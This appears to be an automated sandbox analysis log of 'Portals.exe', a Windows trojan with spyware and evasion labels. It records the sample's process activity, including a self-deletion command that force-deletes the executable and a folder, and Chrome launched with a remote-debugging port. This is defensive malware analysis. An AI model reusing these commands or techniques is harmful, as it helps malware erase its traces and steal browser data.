        Source: Portals.exeStatic PE information: Section: .CSS ZLIB complexity 1.0003622159090908
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/27@7/7
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00411250 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,1_2_00411250
        Source: C:\Users\user\Desktop\Portals.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\76561199829660832[1].htmJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7976
        Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\277323bf-2f2b-405b-8132-249112653105Jump to behavior
        Source: Portals.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Portals.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\Portals.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: chrome.exe, 0000000D.00000002.1931402550.0000322C01744000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
        Source: chrome.exe, 0000000D.00000002.1931889149.0000322C018D8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';;
        Source: chrome.exe, 0000000D.00000002.1930155101.0000322C0141C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
        Source: chrome.exe, 0000000D.00000002.1923313597.0000322C00E68000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1926747902.0000322C01188000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1919052863.0000322C00300000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
        Source: chrome.exe, 0000000D.00000002.1921038871.0000322C0085A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
        Source: chrome.exe, 0000000D.00000002.1931672879.0000322C0180C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
        Source: chrome.exe, 0000000D.00000002.1923313597.0000322C00E68000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1926747902.0000322C01188000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1919052863.0000322C00300000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
        Source: chrome.exe, 0000000D.00000002.1931889149.0000322C018D8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
        Source: chrome.exe, 0000000D.00000002.1930155101.0000322C0141C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';reamFactory
        Source: chrome.exe, 0000000D.00000002.1931402550.0000322C01744000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
        Source: xt00zm7q1.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: chrome.exe, 0000000D.00000002.1931402550.0000322C01744000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
        Source: chrome.exe, 0000000D.00000002.1926400191.0000322C01160000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';
        Source: Portals.exeVirustotal: Detection: 69%
        Source: Portals.exeReversingLabs: Detection: 86%
        Source: C:\Users\user\Desktop\Portals.exeFile read: C:\Users\user\Desktop\Portals.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Portals.exe "C:\Users\user\Desktop\Portals.exe"
        Source: C:\Users\user\Desktop\Portals.exeProcess created: C:\Users\user\Desktop\Portals.exe "C:\Users\user\Desktop\Portals.exe"
        Source: C:\Users\user\Desktop\Portals.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 784
        Source: C:\Users\user\Desktop\Portals.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2172,i,4152094786765586208,9576853780185441522,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2440 /prefetch:3
        Source: C:\Users\user\Desktop\Portals.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & del /f /q "C:\Users\user\Desktop\Portals.exe" & rd /s /q "C:\ProgramData\i58ym" & exit
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 11
        Source: C:\Users\user\Desktop\Portals.exeProcess created: C:\Users\user\Desktop\Portals.exe "C:\Users\user\Desktop\Portals.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & del /f /q "C:\Users\user\Desktop\Portals.exe" & rd /s /q "C:\ProgramData\i58ym" & exitJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2172,i,4152094786765586208,9576853780185441522,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2440 /prefetch:3Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 11Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Portals.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: Portals.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Portals.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: Portals.exe
        Source: Binary string: System.Windows.Forms.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: Portals.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: System.Windows.Forms.pdbh source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: mscorlib.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: System.ni.pdbRSDS source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: mscorlib.ni.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: System.pdb) source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: Portals.exe
        Source: Binary string: mscorlib.ni.pdbRSDS source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: System.ni.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: Binary string: System.pdb source: WER4DB2.tmp.dmp.4.dr
        Source: Portals.exeStatic PE information: 0xADFF511F [Mon Jul 3 22:20:15 2062 UTC]
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004108E0
        Source: Portals.exeStatic PE information: section name: .CSS

        Hooking and other Techniques for Hiding and Protection

        barindex
        Self deletion via cmd or bat file
        Source: C:\Users\user\Desktop\Portals.exeProcess created: "C:\Windows\system32\cmd.exe" /c timeout /t 11 & del /f /q "C:\Users\user\Desktop\Portals.exe" & rd /s /q "C:\ProgramData\i58ym" & exit
        Source: C:\Users\user\Desktop\Portals.exeProcess created: "C:\Windows\system32\cmd.exe" /c timeout /t 11 & del /f /q "C:\Users\user\Desktop\Portals.exe" & rd /s /q "C:\ProgramData\i58ym" & exitJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004108E0
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeMemory allocated: 740000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeMemory allocated: 2380000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
        Source: C:\Users\user\Desktop\Portals.exeEvasive API call chain: GetSystemTime,DecisionNodes
        Source: C:\Windows\SysWOW64\timeout.exe TID: 6472Thread sleep count: 94 > 30Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00414E70 wsprintfA,FindFirstFileA,DeleteFileA,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,1_2_00414E70
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00407210 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,CopyFileA,DeleteFileA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,1_2_00407210
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0040B6B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindClose,1_2_0040B6B0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00415EB0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,1_2_00415EB0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00408360 FindFirstFileA,CopyFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindClose,1_2_00408360
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00413FD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,1_2_00413FD0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_004013F0 FindFirstFileA,FindClose,FindNextFileA,strlen,FindFirstFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,DeleteFileA,FindClose,1_2_004013F0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00413580 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindClose,1_2_00413580
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_004097B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,1_2_004097B0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0040ACD0 wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,lstrlenA,DeleteFileA,CopyFileA,FindClose,1_2_0040ACD0
